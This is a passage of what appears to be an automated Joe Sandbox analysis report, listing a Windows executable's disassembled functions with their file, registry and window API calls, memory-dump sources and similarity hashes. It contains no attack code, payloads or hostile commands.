                                                                                                                                                                                                                                Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404658 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
